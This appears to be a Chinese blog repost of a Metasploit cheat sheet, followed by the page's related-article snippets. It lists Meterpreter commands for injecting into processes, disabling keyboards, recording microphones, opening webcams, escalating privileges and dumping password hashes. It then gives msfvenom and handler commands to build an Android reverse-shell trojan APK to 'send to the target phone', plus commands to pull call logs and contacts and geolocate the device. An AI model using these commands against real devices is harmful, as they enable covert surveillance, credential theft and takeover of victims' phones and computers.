【记录】metasploit总结

最新推荐文章于 2024-08-05 15:19:22 发布
最新推荐文章于 2024-08-05 15:19:22 发布
阅读量75 收藏
点赞数
文章标签: 运维 移动开发 开发工具
原文链接:http://www.cnblogs.com/peterpan0707007/p/7852188.html
版权

sessions -l 查看会话

backgroud 暂时退出当前会话

注入进程:
ps 查看进程
migrate 注入进程 进程ID 一般选择explorer.exe对应的PID
run vnc 查看远程桌面

文件操作
cat 查看文件
edit 编辑文件
upload 上传文件
download 下载文件
rm 删除文件
mkdir 创建文件夹
rmdir 删除文件夹

网络及系统操作
enumdesktops 在线用户数
uictl disable keyboard 让键盘失效
uictl enable keyboard 恢复键盘
record_mic -d 10 音频录制 录制10秒
webcam_stream 开启摄像头
getsystem 获取最高权限
hashdump 密码hash


安卓

制作木马kali_linux_2017.1_vm_amd64虚机中

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.18.250 LPORT=12345 R > test.apk

进入msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp 

set LHOST 192.168.18.250

set LPORT 12345

exploit

将test.apk发送到目标手机安装运行即可

常用命令:
search 搜索 search -f *.jpg ?
download
webcam_stream -i 1/2 打开前置或后置摄像头
check_root 检测root
dump_calllog 下载电话记录
dump_contacts 下载信息记录
geolocate 定位,需要下载谷歌地图

 

kali开启ssh

1、vim /etc/ssh/sshd_config 添加 PermitRootLogin yes

2、开启ssh服务 service ssh start

metasploit
msfconsole下启动nmap进行端口扫描
msf > nmap -v sV IP
msf > search portscan
msf > use auxiliary/scanner/portscan/syn
msf > use auxiliary/scanner/portscan/tcp
msf > use auxiliary/scanner/smb/smb_version

msf > use auxiliary/scanner/ftp/ftp_version

转载于:https://www.cnblogs.com/peterpan0707007/p/7852188.html

weixin_30608503
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Metasploit学习总结
马赛克的博客
04-04 595
一:前言 Metasploit是一个漏洞利用框架,我们可以获取,使用,开发,共享漏洞攻击程序,(可以根据自己的需要开发漏洞攻击程序)。 并且提供了大量的攻击载荷供我们选择,所谓的攻击载荷就是再目标计算机上实现"额外的功能",就像是回答的问题:“我已经控制了机器,还要做什么”,一般来说,最受欢迎的攻击载荷包括添加用户,开启后门,以及在目标机安装新软件。 二:使用 原则:把Metasploit...
学习metasploit漏洞总结
NS的博客
10-26 2211
学习metasploit漏洞利用总结(一)实验准备 vm虚拟机 kali 以及目的主机,我选取的是xp系统。这里可以将xp系统的防火墙关掉,或者找专门做靶机的系统。安装过程在这里不过多叙述,我的安装道路非常坎坷,有时间会总结成另一篇文,这里就先总结开始学习的一部分。 1.打开两个系统,查询他们的ip地址,互相ping,看是否可以ping通,如果ping通可以继续下面的操作。 这里面在k
Metasploit Framework 总结
code_lab
07-02 706
2.Metesploit Framework 基础知识调用 exploit漏洞用use 使用payload用set 参数也是用set启动: 命令行输入:msfconsole 命令行输入:msfcli +参数 图形化界面输入:armitage 3.实例讲解1 ms10_046快捷方式图标漏洞命令行msfconsole use exploit/windows/browser/ms10_046_sh
metasploit使用总结
醉等佳人归
07-19 310
文章目录1.信息收集模块2.密码破解模块3.漏洞利用模块4.shellcode使用及免杀4.1.windows4.2.linux4.3.Android4.4.java4.5.php4.6.免杀5.meterpreter使用5.1.持久化控制PC(APT) 1.信息收集模块 2.密码破解模块 3.漏洞利用模块 4.shellcode使用及免杀 msfvenom 取代了 msfpayload命令 4.1.windows 4.2.linux 4.3.Android 4.4
Metasploit入门基础知识总结
Deeeelete的博客
02-18 769
基本信息: 以前用 Metasploit的时候都是无脑的照着操作,虽然只要操作无误就可以实现效果,但这种方式也只是知其果,不知其因果,这样做不系统,也不全面,所以通过学习就把 Metasploit的基础知识又整理了一下。 Metasploit 渗透测试框架有着核心的三个库:Rex、framework-core 、framework-base。这些库对框架本身提供了最基础最底层的一些环境依赖,...
metasploit
10-04
6. **后渗透操作**:如果成功,会进入交互式Meterpreter会话,可进行文件操作、屏幕截取、键盘记录等后渗透活动。 ### 四、Armitage 界面 Armitage是一个图形化的界面,简化了Metasploit的操作,特别适合初学者。...
Metasploit 学习指南
08-26
- 创建一个新的项目来组织和记录测试过程中的所有信息。 - 指定项目的名称、描述等基本信息。 - 定义项目的范围和边界,以便后续的操作都在这个范围内进行。 2. **发现设备:** - 通过各种方法和技术来识别网络...
Metasploit 整理笔记
ling_xiao007的专栏
02-21 5714
Metasploit整理笔记
Metasploit入门用法(主动攻击)
热门推荐
shark-CV的博客
06-03 8万+
Metasploit入门用法(主动攻击) –作者:CV 本文主要讲metasploit的入门用法,还有一些渗透细节和思路,有不足的,欢迎互相学习研究。本人区别于书籍的特点是:书籍以模块为划分,我是以连续的步骤进行书写,更突出一次渗透的思路,同时我会通过强调步骤的细节技巧,用以拓展相关类容。
Metasploit后渗透|总结|键盘记录|提权
qq_60115503的博客
06-19 976
Metasploit提供了一个非常强大的后渗透工具————Meterpreter,该工具具有多重功能,使后续的渗透入侵变得更容易。 获取目标机的Meterpreter Shell后,就进入了Metasploit最精彩的后期渗透利用阶段,后期渗透模块有200多个,Meterpreter有以下优势查看靶机文件和目录ls查看靶机相关系统信息sysinfo查看攻击机或者监控机的文件和目录lls查看当前攻击或者监控机器的目录路径getlwd查看当前靶机的目录位置pwd/getwd删除靶机中的目录文件rmdir XXX
Metasploit 学习笔记
不急不躁
07-11 2万+
在Kali中使用Metasploit,需要先开启PostgreSQL数据库服务和Metasploit服务 然后就可以完整的利用 msf 数据库查询 exploit 和记录service postgresql start service metasploit start如果不想每次开机都这样,还可以配置随系统启动update-rc.d postgresql enable update-rc.d me
nodejs项目
weixin_70751365的博客
07-31 1136
一、基于域名配置server一、基于域名配置server1.一个配置文件一般只有一个http模块2.一个http模块可以有多个server模块3.一个server模块就是一套web项目4.一个server模块中可以有多个location就是项目中的url路由第一步mkdir/zhangmin第二部echo第三步vim第三步http{server{listen80;第四步vim/etc/hosts10curl。
简单搭建dns服务器
ANCHG_的博客
08-04 182
简单搭建dns服务器
安装VMware16
最新发布
qwy715229258163的博客
08-05 106
安装VMware16的步骤主要包括下载、‌安装和激活。‌。
Metasploit框架基础教程
"Metasploit基础知识" Metasploit是一款强大的安全测试工具,它被广泛用于漏洞利用、渗透测试和安全研究。这个框架由各种接口组成,允许用户以不同的方式与其交互。本文将主要介绍Metasploit中的基础概念和一个重要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值